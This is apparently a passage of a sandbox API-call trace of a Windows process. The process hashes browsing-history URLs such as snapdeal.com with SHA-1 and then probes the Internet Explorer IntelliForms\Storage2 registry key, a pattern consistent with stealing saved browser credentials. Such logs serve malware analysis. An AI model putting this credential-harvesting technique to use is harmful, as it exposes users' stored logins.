[0249.433] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd217c30 [0249.433] lstrcpyW (in: lpString1=0xd217c30, lpString2="B2F30085B1A0B79D31" | out: lpString1="B2F30085B1A0B79D31") returned="B2F30085B1A0B79D31" [0249.433] lstrcatW (in: lpString1="B2F30085B1A0B79D31", lpString2="77" | out: lpString1="B2F30085B1A0B79D3177") returned="B2F30085B1A0B79D3177" [0249.433] LocalFree (hMem=0xd1d0860) returned 0x0 [0249.433] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A4") returned 2 [0249.433] lstrlenW (lpString="B2F30085B1A0B79D3177") returned 20 [0249.433] lstrlenW (lpString="A4") returned 2 [0249.433] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd217570 [0249.433] lstrcpyW (in: lpString1=0xd217570, lpString2="B2F30085B1A0B79D3177" | out: lpString1="B2F30085B1A0B79D3177") returned="B2F30085B1A0B79D3177" [0249.433] lstrcatW (in: lpString1="B2F30085B1A0B79D3177", lpString2="A4" | out: lpString1="B2F30085B1A0B79D3177A4") returned="B2F30085B1A0B79D3177A4" [0249.433] LocalFree (hMem=0xd217c30) returned 0x0 [0249.433] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F3") returned 2 [0249.433] lstrlenW (lpString="B2F30085B1A0B79D3177A4") returned 22 [0249.433] lstrlenW (lpString="F3") returned 2 [0249.433] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd217630 [0249.434] lstrcpyW (in: lpString1=0xd217630, lpString2="B2F30085B1A0B79D3177A4" | out: lpString1="B2F30085B1A0B79D3177A4") returned="B2F30085B1A0B79D3177A4" [0249.434] lstrcatW (in: lpString1="B2F30085B1A0B79D3177A4", lpString2="F3" | out: lpString1="B2F30085B1A0B79D3177A4F3") returned="B2F30085B1A0B79D3177A4F3" [0249.434] LocalFree (hMem=0xd217570) returned 0x0 [0249.434] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="12") returned 2 [0249.434] lstrlenW (lpString="B2F30085B1A0B79D3177A4F3") returned 24 [0249.434] lstrlenW (lpString="12") returned 2 [0249.434] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd218230 [0249.434] lstrcpyW (in: lpString1=0xd218230, lpString2="B2F30085B1A0B79D3177A4F3" | out: lpString1="B2F30085B1A0B79D3177A4F3") returned="B2F30085B1A0B79D3177A4F3" [0249.434] lstrcatW (in: lpString1="B2F30085B1A0B79D3177A4F3", lpString2="12" | out: lpString1="B2F30085B1A0B79D3177A4F312") returned="B2F30085B1A0B79D3177A4F312" [0249.434] LocalFree (hMem=0xd217630) returned 0x0 [0249.434] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="2E") returned 2 [0249.434] lstrlenW (lpString="B2F30085B1A0B79D3177A4F312") returned 26 [0249.434] lstrlenW (lpString="2E") returned 2 [0249.434] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd214660 [0249.434] lstrcpyW (in: lpString1=0xd214660, lpString2="B2F30085B1A0B79D3177A4F312" | out: lpString1="B2F30085B1A0B79D3177A4F312") returned="B2F30085B1A0B79D3177A4F312" [0249.434] lstrcatW (in: lpString1="B2F30085B1A0B79D3177A4F312", lpString2="2E" | out: lpString1="B2F30085B1A0B79D3177A4F3122E") returned="B2F30085B1A0B79D3177A4F3122E" [0249.434] LocalFree (hMem=0xd218230) returned 0x0 [0249.434] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="96") returned 2 [0249.434] lstrlenW (lpString="B2F30085B1A0B79D3177A4F3122E") returned 28 [0249.434] lstrlenW (lpString="96") returned 2 [0249.434] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd214730 [0249.434] lstrcpyW (in: lpString1=0xd214730, lpString2="B2F30085B1A0B79D3177A4F3122E" | out: lpString1="B2F30085B1A0B79D3177A4F3122E") returned="B2F30085B1A0B79D3177A4F3122E" [0249.434] lstrcatW (in: lpString1="B2F30085B1A0B79D3177A4F3122E", lpString2="96" | out: lpString1="B2F30085B1A0B79D3177A4F3122E96") returned="B2F30085B1A0B79D3177A4F3122E96" [0249.434] LocalFree (hMem=0xd214660) returned 0x0 [0249.434] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="FF") returned 2 [0249.434] lstrlenW (lpString="B2F30085B1A0B79D3177A4F3122E96") returned 30 [0249.434] lstrlenW (lpString="FF") returned 2 [0249.434] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd2151c0 [0249.434] lstrcpyW (in: lpString1=0xd2151c0, lpString2="B2F30085B1A0B79D3177A4F3122E96" | out: lpString1="B2F30085B1A0B79D3177A4F3122E96") returned="B2F30085B1A0B79D3177A4F3122E96" [0249.434] lstrcatW (in: lpString1="B2F30085B1A0B79D3177A4F3122E96", lpString2="FF" | out: lpString1="B2F30085B1A0B79D3177A4F3122E96FF") returned="B2F30085B1A0B79D3177A4F3122E96FF" [0249.434] LocalFree (hMem=0xd214730) returned 0x0 [0249.434] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="11") returned 2 [0249.434] lstrlenW (lpString="B2F30085B1A0B79D3177A4F3122E96FF") returned 32 [0249.434] lstrlenW (lpString="11") returned 2 [0249.434] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd215df0 [0249.434] lstrcpyW (in: lpString1=0xd215df0, lpString2="B2F30085B1A0B79D3177A4F3122E96FF" | out: lpString1="B2F30085B1A0B79D3177A4F3122E96FF") returned="B2F30085B1A0B79D3177A4F3122E96FF" [0249.434] lstrcatW (in: lpString1="B2F30085B1A0B79D3177A4F3122E96FF", lpString2="11" | out: lpString1="B2F30085B1A0B79D3177A4F3122E96FF11") returned="B2F30085B1A0B79D3177A4F3122E96FF11" [0249.434] LocalFree (hMem=0xd2151c0) returned 0x0 [0249.434] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="85") returned 2 [0249.434] lstrlenW (lpString="B2F30085B1A0B79D3177A4F3122E96FF11") returned 34 [0249.435] lstrlenW (lpString="85") returned 2 [0249.435] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d67840 [0249.435] lstrcpyW (in: lpString1=0x5d67840, lpString2="B2F30085B1A0B79D3177A4F3122E96FF11" | out: lpString1="B2F30085B1A0B79D3177A4F3122E96FF11") returned="B2F30085B1A0B79D3177A4F3122E96FF11" [0249.435] lstrcatW (in: lpString1="B2F30085B1A0B79D3177A4F3122E96FF11", lpString2="85" | out: lpString1="B2F30085B1A0B79D3177A4F3122E96FF1185") returned="B2F30085B1A0B79D3177A4F3122E96FF1185" [0249.435] LocalFree (hMem=0xd215df0) returned 0x0 [0249.435] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="36") returned 2 [0249.435] lstrlenW (lpString="B2F30085B1A0B79D3177A4F3122E96FF1185") returned 36 [0249.435] lstrlenW (lpString="36") returned 2 [0249.435] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d667a0 [0249.435] lstrcpyW (in: lpString1=0x5d667a0, lpString2="B2F30085B1A0B79D3177A4F3122E96FF1185" | out: lpString1="B2F30085B1A0B79D3177A4F3122E96FF1185") returned="B2F30085B1A0B79D3177A4F3122E96FF1185" [0249.435] lstrcatW (in: lpString1="B2F30085B1A0B79D3177A4F3122E96FF1185", lpString2="36" | out: lpString1="B2F30085B1A0B79D3177A4F3122E96FF118536") returned="B2F30085B1A0B79D3177A4F3122E96FF118536" [0249.435] LocalFree (hMem=0x5d67840) returned 0x0 [0249.435] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F8") returned 2 [0249.435] lstrlenW (lpString="B2F30085B1A0B79D3177A4F3122E96FF118536") returned 38 [0249.435] lstrlenW (lpString="F8") returned 2 [0249.435] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d66960 [0249.435] lstrcpyW (in: lpString1=0x5d66960, lpString2="B2F30085B1A0B79D3177A4F3122E96FF118536" | out: lpString1="B2F30085B1A0B79D3177A4F3122E96FF118536") returned="B2F30085B1A0B79D3177A4F3122E96FF118536" [0249.435] lstrcatW (in: lpString1="B2F30085B1A0B79D3177A4F3122E96FF118536", lpString2="F8" | out: lpString1="B2F30085B1A0B79D3177A4F3122E96FF118536F8") returned="B2F30085B1A0B79D3177A4F3122E96FF118536F8" [0249.435] LocalFree (hMem=0x5d667a0) returned 0x0 [0249.435] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A7") returned 2 [0249.435] lstrlenW (lpString="B2F30085B1A0B79D3177A4F3122E96FF118536F8") returned 40 [0249.435] lstrlenW (lpString="A7") returned 2 [0249.435] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d66340 [0249.435] lstrcpyW (in: lpString1=0x5d66340, lpString2="B2F30085B1A0B79D3177A4F3122E96FF118536F8" | out: lpString1="B2F30085B1A0B79D3177A4F3122E96FF118536F8") returned="B2F30085B1A0B79D3177A4F3122E96FF118536F8" [0249.435] lstrcatW (in: lpString1="B2F30085B1A0B79D3177A4F3122E96FF118536F8", lpString2="A7" | out: lpString1="B2F30085B1A0B79D3177A4F3122E96FF118536F8A7") returned="B2F30085B1A0B79D3177A4F3122E96FF118536F8A7" [0249.435] LocalFree (hMem=0x5d66960) returned 0x0 [0249.435] CryptDestroyHash (hHash=0x5d9d8a0) returned 1 [0249.435] CryptReleaseContext (hProv=0x5d39710, dwFlags=0x0) returned 1 [0249.435] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.435] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.435] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.435] LocalFree (hMem=0x5d66340) returned 0x0 [0249.435] RegEnumValueW (in: hKey=0x94c, dwIndex=0x11, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url6", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.435] StrStrIW (lpFirst="snapdeal.com", lpSrch="?") returned 0x0 [0249.435] StrStrIW (lpFirst="snapdeal.com", lpSrch="http://") returned 0x0 [0249.436] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d38c10) returned 1 [0249.436] CryptCreateHash (in: hProv=0x5d38c10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.436] lstrlenW (lpString="snapdeal.com") returned 12 [0249.436] CryptHashData (hHash=0x5d9d6e0, pbData=0x43ed4e0, dwDataLen=0x1a, dwFlags=0x0) returned 1 [0249.436] CryptGetHashParam (in: hHash=0x5d9d6e0, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.436] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="33") returned 2 [0249.436] lstrlenW (lpString="") returned 0 [0249.436] lstrlenW (lpString="33") returned 2 [0249.436] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b3f50 [0249.436] lstrcpyW (in: lpString1=0xd1b3f50, lpString2="" | out: lpString1="") returned="" [0249.436] lstrcatW (in: lpString1="", lpString2="33" | out: lpString1="33") returned="33" [0249.436] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="04") returned 2 [0249.436] lstrlenW (lpString="33") returned 2 [0249.436] lstrlenW (lpString="04") returned 2 [0249.436] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33db0 [0249.436] lstrcpyW (in: lpString1=0x5d33db0, lpString2="33" | out: lpString1="33") returned="33" [0249.436] lstrcatW (in: lpString1="33", lpString2="04" | out: lpString1="3304") returned="3304" [0249.436] LocalFree (hMem=0xd1b3f50) returned 0x0 [0249.436] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="6F") returned 2 [0249.436] lstrlenW (lpString="3304") returned 4 [0249.436] lstrlenW (lpString="6F") returned 2 [0249.436] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d34170 [0249.436] lstrcpyW (in: lpString1=0x5d34170, lpString2="3304" | out: lpString1="3304") returned="3304" [0249.436] lstrcatW (in: lpString1="3304", lpString2="6F" | out: lpString1="33046F") returned="33046F" [0249.436] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.436] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="2D") returned 2 [0249.437] lstrlenW (lpString="33046F") returned 6 [0249.437] lstrlenW (lpString="2D") returned 2 [0249.437] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33db0 [0249.437] lstrcpyW (in: lpString1=0x5d33db0, lpString2="33046F" | out: lpString1="33046F") returned="33046F" [0249.437] lstrcatW (in: lpString1="33046F", lpString2="2D" | out: lpString1="33046F2D") returned="33046F2D" [0249.437] LocalFree (hMem=0x5d34170) returned 0x0 [0249.437] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="BF") returned 2 [0249.437] lstrlenW (lpString="33046F2D") returned 8 [0249.437] lstrlenW (lpString="BF") returned 2 [0249.437] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d34170 [0249.437] lstrcpyW (in: lpString1=0x5d34170, lpString2="33046F2D" | out: lpString1="33046F2D") returned="33046F2D" [0249.437] lstrcatW (in: lpString1="33046F2D", lpString2="BF" | out: lpString1="33046F2DBF") returned="33046F2DBF" [0249.437] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.437] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D6") returned 2 [0249.437] lstrlenW (lpString="33046F2DBF") returned 10 [0249.437] lstrlenW (lpString="D6") returned 2 [0249.437] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d0390 [0249.437] lstrcpyW (in: lpString1=0xd1d0390, lpString2="33046F2DBF" | out: lpString1="33046F2DBF") returned="33046F2DBF" [0249.437] lstrcatW (in: lpString1="33046F2DBF", lpString2="D6" | out: lpString1="33046F2DBFD6") returned="33046F2DBFD6" [0249.437] LocalFree (hMem=0x5d34170) returned 0x0 [0249.437] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="EE") returned 2 [0249.437] lstrlenW (lpString="33046F2DBFD6") returned 12 [0249.437] lstrlenW (lpString="EE") returned 2 [0249.437] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1cfe10 [0249.437] lstrcpyW (in: lpString1=0xd1cfe10, lpString2="33046F2DBFD6" | out: lpString1="33046F2DBFD6") returned="33046F2DBFD6" [0249.437] lstrcatW (in: lpString1="33046F2DBFD6", lpString2="EE" | out: lpString1="33046F2DBFD6EE") returned="33046F2DBFD6EE" [0249.437] LocalFree (hMem=0xd1d0390) returned 0x0 [0249.437] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="0B") returned 2 [0249.437] lstrlenW (lpString="33046F2DBFD6EE") returned 14 [0249.437] lstrlenW (lpString="0B") returned 2 [0249.437] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1d0390 [0249.437] lstrcpyW (in: lpString1=0xd1d0390, lpString2="33046F2DBFD6EE" | out: lpString1="33046F2DBFD6EE") returned="33046F2DBFD6EE" [0249.437] lstrcatW (in: lpString1="33046F2DBFD6EE", lpString2="0B" | out: lpString1="33046F2DBFD6EE0B") returned="33046F2DBFD6EE0B" [0249.437] LocalFree (hMem=0xd1cfe10) returned 0x0 [0249.437] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="56") returned 2 [0249.437] lstrlenW (lpString="33046F2DBFD6EE0B") returned 16 [0249.437] lstrlenW (lpString="56") returned 2 [0249.437] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d05a0 [0249.437] lstrcpyW (in: lpString1=0xd1d05a0, lpString2="33046F2DBFD6EE0B" | out: lpString1="33046F2DBFD6EE0B") returned="33046F2DBFD6EE0B" [0249.438] lstrcatW (in: lpString1="33046F2DBFD6EE0B", lpString2="56" | out: lpString1="33046F2DBFD6EE0B56") returned="33046F2DBFD6EE0B56" [0249.438] LocalFree (hMem=0xd1d0390) returned 0x0 [0249.438] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="2D") returned 2 [0249.438] lstrlenW (lpString="33046F2DBFD6EE0B56") returned 18 [0249.438] lstrlenW (lpString="2D") returned 2 [0249.438] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd2179f0 [0249.438] lstrcpyW (in: lpString1=0xd2179f0, lpString2="33046F2DBFD6EE0B56" | out: lpString1="33046F2DBFD6EE0B56") returned="33046F2DBFD6EE0B56" [0249.438] lstrcatW (in: lpString1="33046F2DBFD6EE0B56", lpString2="2D" | out: lpString1="33046F2DBFD6EE0B562D") returned="33046F2DBFD6EE0B562D" [0249.438] LocalFree (hMem=0xd1d05a0) returned 0x0 [0249.438] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="98") returned 2 [0249.438] lstrlenW (lpString="33046F2DBFD6EE0B562D") returned 20 [0249.438] lstrlenW (lpString="98") returned 2 [0249.438] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd217c30 [0249.438] lstrcpyW (in: lpString1=0xd217c30, lpString2="33046F2DBFD6EE0B562D" | out: lpString1="33046F2DBFD6EE0B562D") returned="33046F2DBFD6EE0B562D" [0249.438] lstrcatW (in: lpString1="33046F2DBFD6EE0B562D", lpString2="98" | out: lpString1="33046F2DBFD6EE0B562D98") returned="33046F2DBFD6EE0B562D98" [0249.438] LocalFree (hMem=0xd2179f0) returned 0x0 [0249.438] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="8E") returned 2 [0249.438] lstrlenW (lpString="33046F2DBFD6EE0B562D98") returned 22 [0249.438] lstrlenW (lpString="8E") returned 2 [0249.438] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd2177b0 [0249.438] lstrcpyW (in: lpString1=0xd2177b0, lpString2="33046F2DBFD6EE0B562D98" | out: lpString1="33046F2DBFD6EE0B562D98") returned="33046F2DBFD6EE0B562D98" [0249.438] lstrcatW (in: lpString1="33046F2DBFD6EE0B562D98", lpString2="8E" | out: lpString1="33046F2DBFD6EE0B562D988E") returned="33046F2DBFD6EE0B562D988E" [0249.438] LocalFree (hMem=0xd217c30) returned 0x0 [0249.438] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="09") returned 2 [0249.438] lstrlenW (lpString="33046F2DBFD6EE0B562D988E") returned 24 [0249.438] lstrlenW (lpString="09") returned 2 [0249.438] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd2180b0 [0249.438] lstrcpyW (in: lpString1=0xd2180b0, lpString2="33046F2DBFD6EE0B562D988E" | out: lpString1="33046F2DBFD6EE0B562D988E") returned="33046F2DBFD6EE0B562D988E" [0249.438] lstrcatW (in: lpString1="33046F2DBFD6EE0B562D988E", lpString2="09" | out: lpString1="33046F2DBFD6EE0B562D988E09") returned="33046F2DBFD6EE0B562D988E09" [0249.438] LocalFree (hMem=0xd2177b0) returned 0x0 [0249.438] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D2") returned 2 [0249.438] lstrlenW (lpString="33046F2DBFD6EE0B562D988E09") returned 26 [0249.438] lstrlenW (lpString="D2") returned 2 [0249.438] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd214800 [0249.438] lstrcpyW (in: lpString1=0xd214800, lpString2="33046F2DBFD6EE0B562D988E09" | out: lpString1="33046F2DBFD6EE0B562D988E09") returned="33046F2DBFD6EE0B562D988E09" [0249.438] lstrcatW (in: lpString1="33046F2DBFD6EE0B562D988E09", lpString2="D2" | out: lpString1="33046F2DBFD6EE0B562D988E09D2") returned="33046F2DBFD6EE0B562D988E09D2" [0249.438] LocalFree (hMem=0xd2180b0) returned 0x0 [0249.439] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="6A") returned 2 [0249.439] lstrlenW (lpString="33046F2DBFD6EE0B562D988E09D2") returned 28 [0249.439] lstrlenW (lpString="6A") returned 2 [0249.439] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd214f50 [0249.439] lstrcpyW (in: lpString1=0xd214f50, lpString2="33046F2DBFD6EE0B562D988E09D2" | out: lpString1="33046F2DBFD6EE0B562D988E09D2") returned="33046F2DBFD6EE0B562D988E09D2" [0249.439] lstrcatW (in: lpString1="33046F2DBFD6EE0B562D988E09D2", lpString2="6A" | out: lpString1="33046F2DBFD6EE0B562D988E09D26A") returned="33046F2DBFD6EE0B562D988E09D26A" [0249.439] LocalFree (hMem=0xd214800) returned 0x0 [0249.439] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="1F") returned 2 [0249.439] lstrlenW (lpString="33046F2DBFD6EE0B562D988E09D26A") returned 30 [0249.439] lstrlenW (lpString="1F") returned 2 [0249.439] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd214db0 [0249.439] lstrcpyW (in: lpString1=0xd214db0, lpString2="33046F2DBFD6EE0B562D988E09D26A" | out: lpString1="33046F2DBFD6EE0B562D988E09D26A") returned="33046F2DBFD6EE0B562D988E09D26A" [0249.439] lstrcatW (in: lpString1="33046F2DBFD6EE0B562D988E09D26A", lpString2="1F" | out: lpString1="33046F2DBFD6EE0B562D988E09D26A1F") returned="33046F2DBFD6EE0B562D988E09D26A1F" [0249.439] LocalFree (hMem=0xd214f50) returned 0x0 [0249.439] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="88") returned 2 [0249.439] lstrlenW (lpString="33046F2DBFD6EE0B562D988E09D26A1F") returned 32 [0249.439] lstrlenW (lpString="88") returned 2 [0249.439] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd2163a0 [0249.439] lstrcpyW (in: lpString1=0xd2163a0, lpString2="33046F2DBFD6EE0B562D988E09D26A1F" | out: lpString1="33046F2DBFD6EE0B562D988E09D26A1F") returned="33046F2DBFD6EE0B562D988E09D26A1F" [0249.439] lstrcatW (in: lpString1="33046F2DBFD6EE0B562D988E09D26A1F", lpString2="88" | out: lpString1="33046F2DBFD6EE0B562D988E09D26A1F88") returned="33046F2DBFD6EE0B562D988E09D26A1F88" [0249.439] LocalFree (hMem=0xd214db0) returned 0x0 [0249.439] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="CF") returned 2 [0249.439] lstrlenW (lpString="33046F2DBFD6EE0B562D988E09D26A1F88") returned 34 [0249.439] lstrlenW (lpString="CF") returned 2 [0249.439] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d66260 [0249.439] lstrcpyW (in: lpString1=0x5d66260, lpString2="33046F2DBFD6EE0B562D988E09D26A1F88" | out: lpString1="33046F2DBFD6EE0B562D988E09D26A1F88") returned="33046F2DBFD6EE0B562D988E09D26A1F88" [0249.439] lstrcatW (in: lpString1="33046F2DBFD6EE0B562D988E09D26A1F88", lpString2="CF" | out: lpString1="33046F2DBFD6EE0B562D988E09D26A1F88CF") returned="33046F2DBFD6EE0B562D988E09D26A1F88CF" [0249.439] LocalFree (hMem=0xd2163a0) returned 0x0 [0249.439] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="BB") returned 2 [0249.439] lstrlenW (lpString="33046F2DBFD6EE0B562D988E09D26A1F88CF") returned 36 [0249.439] lstrlenW (lpString="BB") returned 2 [0249.439] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d67e60 [0249.440] lstrcpyW (in: lpString1=0x5d67e60, lpString2="33046F2DBFD6EE0B562D988E09D26A1F88CF" | out: lpString1="33046F2DBFD6EE0B562D988E09D26A1F88CF") returned="33046F2DBFD6EE0B562D988E09D26A1F88CF" [0249.440] lstrcatW (in: lpString1="33046F2DBFD6EE0B562D988E09D26A1F88CF", lpString2="BB" | out: lpString1="33046F2DBFD6EE0B562D988E09D26A1F88CFBB") returned="33046F2DBFD6EE0B562D988E09D26A1F88CFBB" [0249.440] LocalFree (hMem=0x5d66260) returned 0x0 [0249.440] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="EA") returned 2 [0249.440] lstrlenW (lpString="33046F2DBFD6EE0B562D988E09D26A1F88CFBB") returned 38 [0249.440] lstrlenW (lpString="EA") returned 2 [0249.440] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d66500 [0249.440] lstrcpyW (in: lpString1=0x5d66500, lpString2="33046F2DBFD6EE0B562D988E09D26A1F88CFBB" | out: lpString1="33046F2DBFD6EE0B562D988E09D26A1F88CFBB") returned="33046F2DBFD6EE0B562D988E09D26A1F88CFBB" [0249.440] lstrcatW (in: lpString1="33046F2DBFD6EE0B562D988E09D26A1F88CFBB", lpString2="EA" | out: lpString1="33046F2DBFD6EE0B562D988E09D26A1F88CFBBEA") returned="33046F2DBFD6EE0B562D988E09D26A1F88CFBBEA" [0249.440] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.440] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="6A") returned 2 [0249.440] lstrlenW (lpString="33046F2DBFD6EE0B562D988E09D26A1F88CFBBEA") returned 40 [0249.440] lstrlenW (lpString="6A") returned 2 [0249.440] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67e60 [0249.440] lstrcpyW (in: lpString1=0x5d67e60, lpString2="33046F2DBFD6EE0B562D988E09D26A1F88CFBBEA" | out: lpString1="33046F2DBFD6EE0B562D988E09D26A1F88CFBBEA") returned="33046F2DBFD6EE0B562D988E09D26A1F88CFBBEA" [0249.440] lstrcatW (in: lpString1="33046F2DBFD6EE0B562D988E09D26A1F88CFBBEA", lpString2="6A" | out: lpString1="33046F2DBFD6EE0B562D988E09D26A1F88CFBBEA6A") returned="33046F2DBFD6EE0B562D988E09D26A1F88CFBBEA6A" [0249.440] LocalFree (hMem=0x5d66500) returned 0x0 [0249.440] CryptDestroyHash (hHash=0x5d9d6e0) returned 1 [0249.440] CryptReleaseContext (hProv=0x5d38c10, dwFlags=0x0) returned 1 [0249.440] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.440] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: 